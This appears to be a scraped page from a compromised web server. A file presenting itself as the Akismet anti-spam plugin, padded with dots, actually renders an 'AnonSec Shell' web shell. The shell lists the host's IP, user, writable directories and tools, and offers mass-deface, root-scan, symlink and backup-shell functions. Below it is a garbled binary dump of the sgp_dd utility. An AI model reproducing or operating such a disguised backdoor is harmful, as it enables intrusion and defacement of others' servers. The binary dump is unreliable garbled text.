#/** * @package Akismet */ /* Plugin Name: Akismet Anti-spam: Spam Protection Plugin URI: https://akismet.com/ Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. Version: 5.4 Requires at least: 5.8 Requires PHP: 7.2 Author: Automattic - Anti-spam Team Author URI: https://automattic.com/wordpress-plugins/ License: GPLv2 or later Text Domain: akismet */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Copyright 2005-2025 Automattic, Inc. */ // Make sure we don't expose any info if called directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 62.109.13.187  /  Your IP : 216.73.216.11   [ Reverse IP ]
Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28
System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : mosrembit ( 6064)
PHP Version : 8.2.28
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /usr/bin/sgp_dd
ELF>F4@@Ї@8	@@@@@@��88@8@@@auau �}�}`�}`� �}�}`�}`TT@T@DDP�td�n�n@�n@��Q�tdR�td�}�}`�}`  /lib64/ld-linux-x86-64.so.2GNU GNU�XF��+�R�EN���8�� D@8;>BE���/���|�qX���9����z�!�=S��yDo�'x3��kF��e���: .�i�q\�N��b���<M2���[)���`�@���`��`��@��`�4V@libsgutils2.so.2__gmon_start__sg_ll_readcap_10sg_get_numsg_ll_readcap_16safe_strerrorsg_get_llnumsg_err_category3sg_print_commandsg_ll_sync_cache_10sg_chk_n_print3_finilibpthread.so.0pthread_cond_initopen64readpthread_sigmaskpthread_mutex_initpthread_cond_wait__errno_locationpthread_mutex_locklseek64pthread_cancelpthread_createpthread_joinsigactionpthread_cond_broadcastclosepthread_mutex_unlocksigwaitlibgcc_s.so.1_Unwind_Resume__gcc_personality_v0libc.so.6exitstrncmpperror__open64_2strncpy__stack_chk_failgetpidkillstrlensigemptysetmemset__fprintf_chksigaddsetfputcfputsmalloc__xstat64stderrioctl__snprintf_chkfwritegettimeofdaystrchrstrcmp__libc_start_mainsysconffree_edata__bss_start_endGCC_3.0GCC_3.3.1GLIBC_2.3.2GLIBC_2.2.5GLIBC_2.7GLIBC_2.4GLIBC_2.3.4	�0P&y	�a_&	��0ri		ui	�ii
!ii
+ui	ti	5�`�`=�` �`(�`0�`8�`@�`H�`P�`X�`	`�`
h�`p�`x�`
��`��`��`��`��`��`��`��`��`Ȁ`Ѐ`؀`�`�`�`��`�`�`�` �`! �`"(�`#0�`98�`$@�`%H�`&P�`'X�`(`�`)h�`*p�`+x�`,��`-��`.��`/��`0��`1��`2��`3��`4��`5ȁ`6Ё`7H��H�Mm H��t�H����5Bm �%Dm @�%Bm h����%:m h�����%2m h����%*m h����%"m h����%m h����%m h����%
m h�p����%m h�`����%�l h	�P����%�l h
�@����%�l h�0����%�l h� ����%�l h
�����%�l h�����%�l h���%�l h����%�l h�����%�l h����%�l h����%�l h����%�l h����%�l h����%�l h�p����%�l h�`����%zl h�P����%rl h�@����%jl h�0����%bl h� ����%Zl h�����%Rl h�����%Jl h���%Bl h ����%:l h!�����%2l h"����%*l h#����%"l h$����%l h%����%l h&����%
l h'�p����%l h(�`����%�k h)�P����%�k h*�@����%�k h+�0����%�k h,� ����%�k h-�����%�k h.�����%�k h/���%�k h0����%�k h1�����%�k h2����%�k h3����%�k h4����%�k h5����%�k h6����%�k h7�p���ATI��hU��SH��H��dH�%(H�D$1�������y�;~�PV@�������61�H��r��������y�fV@������HcH�$H�H��I�$1�H�L$dH3%(t����H��[]A\�ATE1�A�A��UH��1�SH��1�H��@H�L$�$dH�%(H�D$81����������D$<����|$����|$����|$�u{H�L$E1�1�1��$A� D���������H�T$H�t$1�H��H��H���B�H	�H9�u�H���T$H�E�D$����	��T$	��T$��	Љ1��L�T$���L$����	��T$	��T$��	��T$H��H�E�D$��	��L$	��	ȉ1�H�\$8dH3%(t���H��@[]A\�USH���b@H�kXPH�5�i ����H���ǃ����H�����H���CT�m���ZH��[]����ATA��"U��S��H�� dH�%(H�D$1�H�T$�����x
�|$/uH�5+i �d@�A�����^A��H�T$1��u"�߉l$�?�����y
�@d@�Q���H�T$1��{"���D$������1���y�hd@�D$� ����D$H�L$dH3%(t���H�� []A\�f.�@AW��A�@�`�.L��AVAUATUSH��dH�%(H��$�
1���H�D$XH�D$`�H�Ƅ$���i ��xh ��h �hh 
��h 
Ƅ$����B�L�vH��$��D$E1��D$4H�l��D$0H�D$ H�D$(A�DI�6H�����H�������$�Ƅ$�
I�؄�t <=u�f.���tI��A�<=u�tA�I��D��$�A��b�1��$�<p�q<s�w��$��iL��������zh ��@I��I9��C����]h �����D$0��t^�D$09Ch tRH�
�f �-���h@��a���1��H��$�
dH3%(����
H��[]A\A]A^A_Ã|$4��H�D$ H��?����H�D$(H��?�����=#g ~H�|$ ���=�g ���=�g �~E��u
��g  ��e ������	�=�g �>��?@��g��?@��X��?@�
�I��9@�
�:��$���e �^f <-��
��$�<-� 
�=�e ��u�6f ���RH�=Me �a	�=g ~)L�L$`L�D$X��l@H�
(e H�=9e �1����H�e H����|$u�=_e ���=�e ��H�L$(H�pe 1�H�oe H��e ���`H��e H�D$ H�
e H�
9e H��e H��e ������1���`�������1����`�������1��@�`�B������L��`�������`�q���1�1���`�s�������1��@�`� ?@��`�E��������=�e t"1��0�`H�2d H�/d ����H�=�d ���=�c ����`������,H�|$p1��@�`� F@�������=He ����`�@�`�K������K��`�i������H�l$x����H��;8c �l1��@�`� F@H���^�����=�d t�H�=&c �ٺ�Y@�1����묐�gX@H��L�����A��cug��$�ou]��$�euS��$�uIL������'c ��c �����$�t�R�gX@H��L�D$8�0�����L�D$8tg��mX@H��L���uyA�8-�ZL�����H���H�Lb �^���H�
Wb �!��`g@�������f�L�������D$�nb ��b ������sX@�H������wX@�H�����A��d��A��f����$�u����X@H��L�D$8�:��L�D$8���X�`L�����������H�
�a �!���g@����������$������L���*��������b �A��0���L��������b ����A�x1�����A�x���������$�iu-��$�ou#��$�uL����6a ��a ������X@H��L�D$8�I��L�D$8����A��o���X@H��L�D$8� ��L�D$8����X@H��L�D$8���L�D$8����X@H��L�D$8����L�D$8�C�W@H��L�D$8����L�D$8�A��t��
��$�h��
��$�r��
��$���
L������_ �����D$49Ea ������V�����$�a������$���L����t
��` ��������_ ���H�
z_ �(��i@������H�
U_ ���	Y@�������H�
0_ ��� g@�����h���H�
_ ���@g@����C���H�=�^ ���h@�1��;` ������H�
�^ �!���h@��Q�����$�<b�<f�����$�������$��XH��$��L�����N����=�_ tH�=m^ u
H�=k^ t1��z�=G^ t
�=�^ �H�=�_ ������
�=:^ ��t�A�=�^ ��t�=�^ t�(�H�
�^ �-�] H��t"H�=�] 1��n@��~��cD�Y@���
_ ��u1�
_ ��tH�=] ��n@�1��>�c��I����H�=X] �8n@�1���1�1��EZ@�y����x�H�t$O�����H����	���a���{���H�
] �*��m@�c���<���1��H��;�\ �����H�|�pH�t$h�C�����=\^ t�H�=�\ �ٺ�m@�1��h�봾؂`L�����������H�
z\ �!���g@������H�
U\ �&��Hi@����1��%����D$E1��D$4�D$0H�D$ H�D$(�����H\ H�D$X�������b�� ��H�D$XH;D$(~
H+D$(H�D$X��\ H�D$`���������� �[H�D$`H9D$ }
H+D$ H�D$`H�T$XH���H����H9�HO�H�S[ ����������H��$��Q���\ H��$������*��������=�[ H��$�����������A@����=�[ E��
�=�[ E����=�[ E�1�������[ �OL��$�A��j@����	���H��$����@��Z �����
�=�Z �������H��$���@����=�Z E��
�=�Z E��D����lZ �;H�L$(H�����Hc5�[ 1҉�H�����H���e�L��$�A�0j@H��$����1����H��$�����H��Y L�D$(L��$�H�=�Y H��$��pi@�H�D$H�D$ H�$1��F��{��$�s�������$������L���-��D$4���@�H�
9Y ����g@�����q�H�
Y �8��(k@��H�
�X �"��hh@���6����A��i������$�<bt:<f������$�����$�upH��$��L��������$�s�������$������L���G��D$0���Z�H�
SX ����g@������H�
.X ���|X@�����f�H�
	X ����X@����A�L��$�A�j@��������H��$���@����=)X E��
�=X E�������W ��Y �5�X ������������H��$���i@H�=YW �1����ԋ=X H�T$TH�t$`����t)H�=+W H��$��l@�1����H�D$`����D�rX D�L$TE9��N���H�=�V H��$���l@�1���H�D$`����� ����=�W H�T$TH�t$`����u0H�
�V �/��hl@�A��=KW H�T$TH�t$`�b���������	H��$�������H�=SV ��k@�1����i���H�T$PH�t$X�~���t)H�=#V H��$��l@�1����H�D$X����D�jW D�L$PE9�����H�=�U H��$��0l@�1���H�D$X�������H�=�U ��k@�1��v�����H�=�U ��k@�1��Y����H�T$PH�t$X�[���u0H�
iU �.��hk@���=�U H�T$PH�t$X�&����[�����	H��$�t?��tH�=U ��k@�1�����=���H�=U ��k@�1���� ���H�=�T ��k@�1�������H��$����	A�oH�$A��W@��Y@H�=�T ��W@�1��c���)�H��$�1�������-U xBH�D$ H�����Hc5�U �=U 1�H����H�����L��$�A��j@�<���L��$�A��j@�)�����T �������=�T H��$���������@����=�T E��
�=�T E�������~T x]�*U �5 U ���;����*�����H�}S �1�H��$��%Y@����L��$�A��i@�~���H�LS ��L��$�A�hj@�_����|$O0�)���H�=:S �EZ@�hn@�1��������H��$����A��H�$A��W@�6Z@�K���H�=�R H��$���Y@�1����=�S E1�E1�1�1�1��D$�$����uAH�
�R � ���m@�@��=JS �D$E1��$E1�1�1�1��j����N�H�
[R ���Z@���.��X@H��L�D$8����uL�D$8L������S ����X@H�����������X@H���M�����A��-uf��$�?u��$�����]Z@H������t��$�VuD��$�u:H�=�Q ��X@��X@�1�1��N������]Z@H�������t�H�=\Q H�ٺ�X@�1����H�
<Q �"��hh@����y�1�1��
�k�L������+Q ��L���*�H�D$(H�����H�
�P � ��@h@��{���L�����H�D$ H�����H�
�P � ��h@��?����H��$����{A�gH�$A��W@��Y@���H��$����RA�aH�$A��W@�&X@���H��$����)H�="P H�$A�^A��W@�X@��W@�1�����d���H�ÿ@�`�%�H�����H�
�O ����Y@�w��(�H��$����A�WH�$A��W@��Y@���H��$����A�TH�$A��W@�(X@����H��$����aA�HH�$A��W@��Y@���H��$����8A�EH�$A��W@�Y@�s���H��$����A�@H�$A��W@�nY@�J���H��$�����A�>H�$A��W@�_Y@�!���H��$����A�<H�$A��W@�PY@���H��$����A�:H�$A��W@�BY@�����=GO �q�H�L$ �����H�H9��=�O ���O�H�
DN �9���m@�����N H�N ���=gN ��H�L$(�����H�H9��=eO �����H�
�M �9��@m@���N H��M ��1�I��^H��H���PTI�0V@H��U@H��p@���`UH-�`H��H��w]øH��t�]��`�����`UH-�`H��H��H��H��?H�H�u]úH��t�]H�ƿ�`����=!M uUH���~���]�M ��@H�=�H t�H��tU��}`H���]�{����s���UH�oXSH��H��H�����H��H����CT���H�����ǃ�H��H��[]�u��DUH��1�S��H��H��dH�%(H��$�1�����H�<$t%H�|$H�,$����1�H���DŽ$����H��$�dH3%(u
H�Ĩ[]�����SH��H��dH�%(H��$�1����H��tYH��H�޿������@x"�D$%�= t<=`�� D�H��$�dH3%(��uzH�Ġ[À;.u����H�T$(H��H��H�� H��%��	ȃ�t"=��t����t���	��D��H����H��0�	к���s��������U�����`SH��H��������4��H�ߺ�H���$�����`����CH��H��[]�f�f.�H�
�K SH��H��tH�=�J �V@�1��X��D�
K L�bJ H��L+�J H�=iJ ��V@�Ic�I)�1��"��D�
[K L�,J H��L+BK H�=3J ��V@[Ic��I)�1������f.�H��H�
J ����hZ@���H�
�I ��� [@���H�
�I �h��@]@H���g���AUA��1�ATUSH��8H�|$dH�%(H�D$(1����L�D$L�L$L+�I L+
�I ���I*�H�=]I E���I*���V@��V@��a@�HD�1�D�%�J H�-I H�.J �Y
�5�X��L$�����L$f.
�5vH)��A*��H*��Y�f.�5wDH�5�H �
�3��H�D$(dH3%(uLH��8[]A\A]��I��I��@B�7����Y
�5H�=�H ��V@���^��I����b��f�H��H�
eH � ���a@�����I ��t
������V@H������Df.�AWAVAUATUSH��H��D����D���E���]����(D���D$L���1�Ic�D�L$�L$L��H�kD�s����D�L$�L$E��t�����t���A��
����A���A���5A��@���D�������v���H��H��8���H��H��0���H��H��(���H��H�� ���H��H�����H��H�����H��H�����D������D������D������H�k0�X@��H����@���f@���J��1������H�t
�H����t
1�H��f�O���t��CD�KL�C�C0SD�c8L�kH���C9@�CX`��H�[hD�C`���S4���A�щS<H�S H�S@H���H�SP�T$��t�K\��,~JH�=F ����V@��V@�pc@�HE�1����H�{H����@���������C���{D;�XH���P����x�1�H��[]A\A]A^A_������A��D����t$���f�A��@���D�������V���H��H�����H��H�����H��H�����D������D������D�������*�������H�����c@�H��������4���fDA����A��@�������
���H��H�������H��H��A������D����OJ�D5�H���^D	������H�
]D �@���b@����"�H�=9D D��0c@�1����H�KD�C��c@H�=D �1�����H�������[]A\A]A^A_ÐA��D���@�������*���H��H�����H��H�����H��H�����D���A������������H�=�C �����b@�1��C���I���ƃ�������H�����1�H����f�w�����C0H�{1�W�o���H�
(C �=��(b@�������H�=C ����hb@�1���������f.�UH��SH��H��dH�%(H�D$1�H�t$��`�A���|$u�H�
�B ����c@�?��H�����H�������f.�S��H��H�|$H�$dH�%(H��$�1�����1�H���DŽ$����H�
#B ����V@�����C ��t1��N����Y@�D�������މ����H��$�dH3%(u	H�Ġ[����DAW�AVAUATI��H��U�W@SH��H��dH�%(H��$1������<$Ƅ$���H��A�A�A��A�$H��tkH�Ӿ,H���;��H����H�P�H��H��L���t����ctf��dug�{i���CW@H��L�����H��A�D$u�fD1�H��$dH3%(�zH��[]A\A]A^A_�D�{otJ�CW@H��L���t��W@H��L�����A�D$�'����1��>���f��{eu��{u�A�D$���fD�{o�/����{�%���A�D$�����{pu��{o�v����{�l���A�D$���fD�"W@H��L���tN��fuW�{uuQ�{auK�{uEA�D$�l���@H�
�? ���W@�M������A�D$�5����'W@H��L����"���H�=k? H�ٺ,W@�1��'����o����8���AW�AVAUI��ATA��USH��H��H�l$dH�%(H��$�1�H��A���H���D$S���D$H�F�D$@�@����8�:E��{D;�XH���,����x�L�|$HI9���H�EL�s0L��H�C0H�EI�FH�EI�FH�EI�FH�E I�F H�E(I�F(H�E0I�F0H�E8I�F8H�E@I�F@H�EHI�FHH�EPI�FP�&������������f�������E��JW@�]W@HD�L��1��F��E���-A�����-ALJ�1�A��,A�GxA���~)H�=�= E���V@��V@��W@�HD�1��s��H��$�dH3%(���8H��[]A\A]A^A_�����b���I�GE��xW@H��$�A�pW@A��W@LDʹ�H�$�1��
��L���R������H��$�1�L���H��L���������U���H�t$p�����A�+H�$A��W@��W@�f�A���������A������������ALJ����fD��d@������������@A��,����E��pW@�xW@HD�L��1��������=��H�t$p���A�A�(H�$A��W@��W@H�=%< ��W@�1���������H��$�1���A�H�$A��W@��d@�@AW�&AVAUATUSH��H��x��4L�����0dH�%(H��$h1�L+oH�|$0�D$,�H������Hc�I��H����H��H�D$X��
J�D �I��H���L!�H�D$P��0��$��D$0����D$4��h��$\�C��$�����$H�CH��$H�C H��$$H�C(H��$,H�C0H��$4H���H��$<H���H��$DH���H��$LH���H��$TH�CXH�D$H��@H�D$DH�|$��������ST���:H�C@H���-Lc�4H�S8�D$8H�T$@I9�LO�L�L)��{E��D�|$HH�S8H�C@u�fD�S���8I�ă�����0H�t$P�;A��Hc��\������x΋�0��A��9���Й����~�CP��H�s8L��HK@HcЉD$H�L)�H�H)�H�s8H�K@H)SHH�|$�D$,�x������H��������z���L��u0��L��HD$@H;����H��L��������������t�H���������H�|$XH��t���H�|$�-�������KT����H�|$�������9H���<���T$,1���HD�H��$hdH3%(�H��x[]A\A]A^A_Ã�t	���iH�|$������:H�|$0�M�������PH�|$�B������H�T$�|$8H�t$0�����A���A������$��u��$��t>H�|$�1������	��$�8��$�<H�|$��������	H�|$��������HcD$HH�|$H)CH������ ���H��$`����H�$A�sA��W@��W@�D���E���A���H���H�����D$,��t
ǃ�L)�H����D$8H����T$HH�D$@L���H��������������u!���+���8���0�T$H��0���H�t$PHc��b������x̋�0D��A9�~�Й����A��~���A��D�t$HMc�L)��H���o�����M�D$,���U���H������������t��f��FH���r�����YH�|$0����������H���������H�T$�|$8H�t$0�����A���u�����D��$E��u��$��t>H�|$�������t��$�8��$�<H�|$�������H���������HcD$HH��H)���\�������H��$`
���U�H�$A���:fD�S�����D$HH�|$P1���$Hc��J��A�<$H��$�
�	�D�D$HH�L$@I��D��$H�=�4 ��e@�1������0�T$H����A��9����L��1�����fD�������H��$�
��D�D$HH�L$@I��D��$H�=x4 ��f@�1��7����0�T$H�����L)��H���6��������H��$`���/�H�$A�p�H�=4 D�Ẩe@�1������4 ���H�����j����C����H�
�3 �'��He@�t����3 �����3 �H��$�
��H�=�3 H����W@�1��V��H���CT���ǃ�H���U��������CT�e����D$HH�|$P1���$Hc��d��D�D$HH�L$@�pe@D��$H�=3 �1��������H�=�2 D�ẘf@�1�����53 ����H�����W���H��$�
��H�=�2 H���OX@�1��v��L�t$L�������CTL���z��ǃ���D���E����H�
d2 �(��8f@���D�
i2 E���e����V2 �V���H�|$������	���H��$�
����A�2H�$A��W@��W@�fDD�%	2 ���D�D$HH�L$@�hf@D��$H�=�1 �1����D��$E����������ǃ�H��������s����@ǃ�H���D$,�V�����H���H��$�
���O�A�eH�$A��W@�&X@H�=31 ��W@�1������DD�%11 �1���H�L$@H�=1 �e@�1����H�|$���������H��$`�����H�$A�GA��W@��W@H�=�0 ��W@�1��q���C�H��$�����H�=�0 H�$A�NA��W@�X@��W@�1��,�������H�L$@H�=F0 �f@�1����H��������J���H��$`����H�$A��A��W@�&X@H�=�/ ��W@�1�����H��$������H�$A�pA��W@��W@����H��$�����H�$A�MA��W@��W@����H��$����H�$A�BA��W@��W@���H��H�����H���F��H��$���D�H�$A��A��W@�7X@�)���H��$�
����H�$A�u�����H��$`	����H�$A��A��W@��W@���H��$`�����H�$A��A��W@�(X@���H��$�	����H�$A��A��W@�(X@���H��$�����H�$A���e���H��$����b�H�$A�iA��W@��W@���H��$����9�H�$A��A��W@��W@����H��$`����H�$A�mA��W@��W@�=���H��$�
�����A�.H�$A��W@��W@���H��$�
���A�H�$A��W@��d@�g���H�
�- �%���f@I��H����,���H�|$�CT�[���H�����H��ǃ��A���H��赾��L���-���H��$`���.�H�$A�WA��W@��W@�[���H��$�
����A�H�$����H��$�
�����A�GH�$A��W@�(X@���H��$`����H�$A�BA��W@��W@���菾��H��$�
����A��H�$A��W@��W@�<���H��$�
���g�A�WH�$A��W@�&X@����f.�AWA��AVI��AUI��ATL�%( UH�-( SL)�1�H��H��譼��H��t�L��L��D��A��H��H9�u�H��[]A\A]A^A_Ðf.���H��H���BLKSSZGET ioctl errorBLKGETSIZE64 ioctl error  remaining block count=%ld
%s%ld+%d records in
%s%ld+%d records out
so farwas, %.2f MB/sec
  WRITEREADInterrupted by signal,no flag found
appenddsyncexclnullunrecognised flag: %s
directwriting continuingreading continuingwritingreadingsgp_dd.c%s at "%s":%d: %s
%s blk=%ldunlock aux_mutexsg_finish_io: completed %s
unlock in_mutexsg starting in commanderror in normal read, %s
cond out_sync_cvunlock out_mutexsg starting out commanderror normal write, %s
cdbszcountdebverbSecond 'if=' argument??
iflagSecond 'of=' argument??
oflagseekskiptime--help-h5.45 20131011sgp_dd: : %s
Unrecognized option '%s'
bpt must be greater than 0
sgp_dd: unable to access %s
init in_mutexinit out_mutexinit aux_mutexinit out_sync_cvpthread_sigmaskpthread_create, sig...pthread_createStarting worker thread k=0
Starting worker thread k=%d
pthread_join>> Synchronizing cache on %s
Unable to synchronize cache
pthread_cancel/proc/scsi/sg/allow_dio--versUsage: sgp_dd  [bs=BS] [count=COUNT] [ibs=BS] [if=IFILE] [iflag=FLAGS]
               [obs=BS] [of=OFILE] [oflag=FLAGS] [seek=SEEK] [skip=SKIP]
               [--help] [--version]

               [bpt=BPT] [cdbsz=6|10|12|16] [coe=0|1] [deb=VERB] [dio=0|1]
               [fua=0|1|2|3] [sync=0|1] [thr=THR] [time=0|1] [verbose=VERB]
  where:
    bpt         is blocks_per_transfer (default is 128)
    bs          must be device block size (default 512)
    cdbsz       size of SCSI READ or WRITE cdb (default is 10)
    coe         continue on error, 0->exit (def), 1->zero + continue
    count       number of blocks to copy (def: device size)
    deb         for debug, 0->none (def), > 0->varying degrees of debug
    dio         is direct IO, 1->attempt, 0->indirect IO (def)
    fua         force unit access: 0->don't(def), 1->OFILE, 2->IFILE,
                3->OFILE+IFILE
    if          file or device to read from (def: stdin)
    iflag       comma separated list from: [coe,dio,direct,dpo,dsync,excl,
                fua, null]
    of          file or device to write to (def: stdout), OFILE of '.'
                treated as /dev/null
    oflag       comma separated list from: [append,coe,dio,direct,dpo,dsync,
                excl,fua,null]
    seek        block position to start writing to OFILE
    skip        block position to start reading from IFILE
    sync        0->no sync(def), 1->SYNCHRONIZE CACHE on OFILE after copy
    thr         is number of threads, must be > 0, default 4, max 16
    time        0->no timing(def), 1->time plus calculate throughput
    verbose     same as 'deb=VERB': increase verbosity
    --help      output this usage message then exit
    --version   output version string then exit
Copy from IFILE to OFILE, similar to dd command
specialized for SCSI devices, uses multiple POSIX threads
time to transfer data %s %d.%06d secsProgress report, continuing ...
thread cancelled while out mutex held
sgp_dd: for 6 byte commands, maximum number of blocks is 256
sgp_dd: for 6 byte commands, can't address blocks beyond %d
sgp_dd: for 6 byte commands, neither dpo nor fua bits supported
sgp_dd: for 10 byte commands, maximum number of blocks is %d
sgp_dd: expected cdb size of 6, 10, 12, or 16 but got %d
sg_start_io: SCSI %s, blk=%ld num_blks=%d
starting io on sg device, errorsgp_dd: bad cdb build, start_blk=%ld, blocks=%d
sgp_dd: interrupted by SIGINT
sgp_dd: sg driver prior to 3.x.y
sgp_dd: SG_SET_RESERVED_SIZE errorsgp_dd: SG_SET_FORCE_PACK_ID errorsg_finish_io: bad usr_ptr, request-response mismatch
finishing io on sg device, errorout of memory creating user buffers
sgp_dd: inputting to sg failed, blk=%ld
error finishing sg in command (medium)
>> substituted zeros for in blk=%ld for %d bytes
error finishing sg in command (%d)
>> substituted zeros for in blk=%ld for %d bytes, %s
sgp_dd: outputting from sg failed, blk=%ld
error finishing sg out command (medium)
>> ignored error for out blk=%ld for %d bytes
error finishing sg out command (%d)
>> ignored error for out blk=%ld for %d bytes, %s
thread cancelled while in mutex held
sgp_dd: bad argument to 'bpt='
sgp_dd: bad argument to 'bs='
sgp_dd: bad argument to 'count='
sgp_dd: bad argument to 'ibs='
sgp_dd: bad argument to 'iflag='
sgp_dd: bad argument to 'obs='
sgp_dd: bad argument to 'oflag='
sgp_dd: bad argument to 'seek='
sgp_dd: bad argument to 'skip='
For more information use '--help'
Assume default 'bs' (block size) of %d bytes
If 'ibs' or 'obs' given must be same as 'bs'
skip and seek cannot be negative
Can't use both append and seek switches
too few or too many threads requested
sgp_dd: if=%s skip=%ld of=%s seek=%ld count=%ld
sgp_dd: unable to use scsi tape device %s
sgp_dd: could not open %s for sg readingsgp_dd: could not open %s for readingsgp_dd: couldn't skip to required position on %ssgp_dd: could not open %s for sg writingsgp_dd: could not open %s for writingsgp_dd: could not open %s for raw writingsgp_dd: couldn't seek to required position on %sWon't default both IFILE to stdin _and_ OFILE to stdout
Unit attention, media changed(in), continuing
read capacity not supported on %s
read capacity failed, %s not ready
Unable to read capacity on %s
Unable to read block capacity on %s
block size on %s confusion; bs=%d, from device=%d
Unit attention, media changed(out), continuing
block size on %s confusion: bs=%d, from device=%d
Start of loop, count=%ld, in_num_sect=%ld, out_num_sect=%ld
Couldn't calculate count, please give one
Note: SCSI command size increased to 16 bytes (for 'if')
Note: SCSI command size increased to 16 bytes (for 'of')
Worker thread k=%d terminated
Unit attention(out), continuing
>>>> Some error occurred, remaining blocks=%ld
>> Direct IO requested but incomplete %d times
>>> %s set to '0' but should be set to '1' for direct IO
>> Non-zero sum of residual counts=%d
���ư>�h㈵��>�@��.A;�У��`���������K�������������V���@��8���`����� `��H��h`����������0��h����P������00�����P@��zRx�n��*zRx�$�����FJw�?;*3$"$D��KA�E�J qDA,l(��yA�F�I�a
AAA$�x���A�J�u
AA,������B�I�C �G0| AAB4����UB�M�F �I`2 AAB$,���DA�H�G nDAT���H�{t���YDP<����>B�G�A �A(�D`�
(A ABBI����ADx$�k���WA�A�M zHAd���3B�B�B �B(�A0�A8�GPi
8A0A(B BBBD�
8F0A(B BBBBt���cA�H�G0$����A�I��
AAL����xB�G�B �B(�G0�F8�G��
8A0A(B BBBF,�����B�I�C �F@� AABL<���\B�G�B �E(�D0�A8�J��
8A0A(B BBBIzPLRx@�T$�����t@B�G�B �B(�A0�A8�J�%
8A0A(B BBBAT|�����?u@B�R�B �B(�A0�A8�G��
8A0A(B BBBAD\x�eB�E�E �E(�H0�H8�M@l8A0A(B BBB��������������
���
3��k�����������2�S��2��Q��Z��
��������������#���.�����
�1�
�%�02�1�1�5@�4@����@
4V@�}`�}`���o�@�@�@
A�`@`
@0
@0	���o�@���o�o@�}`�@�@�@@@&@6@F@V@f@v@�@�@�@�@�@�@�@�@@@&@6@F@V@f@v@�@�@�@�@�@�@�@�@@@&@6@F@V@f@v@�@�@�@�@�@�@�@�@@@&@6@F@��������sgp_dd.debug
�"�7zXZ�ִF!t/���j]?�E�h=��ڊ̓�N�%����D��p�ZQb���ڂ%ym�G#a�J�댻F�%v��8S����]�sG��5�K8V��Cb�y�ZF��N),�H4-�)#d&�ڼ�]�(���Ȇ���mT6/�g�
�;j`��s,퍨�}OT��V��"�f��e�w�0?�����<�{��%9*���H	l
�(Rduxz3\ơ��l�p��Z�g�ZR�������?o̹V��`(��	��1;��#���^�6��#>��#md�=|�|�A���2b�0x�-v���(Ջ���Sۻ���&���nO�^��o���oR�d]ArLb�l�=���U�Mo��m���N$����ha&�`�&`�s�T�nR&:r�!�@|�{�Ks-\~�F�~�r��F˞'���D ���Y��v|��4o	��4c���B豃-��c���ѱ����>����Vc&5p��A�H_P�h�t�SǍ�g7��@(y}з/5���O/��6��ʷ5�l�>�4
j.[�sy����X'��o�V|�QD����7��mKC�Yc(߯�/���*Rt����W��+�!'7>���{ם,��"Q�Z�m.(�����7�_p�l+�
���Nr�38_�T�y\��AB=�|+z�p�#�i����d�	�T[�	�򶳲��k��,���\$b W
��	
�[�B���T���� �2�t�r�I�w��չ�X�yI�.��u�# {�Ҋ�Cd}ݯ�kΚG[�<#\$F����J�
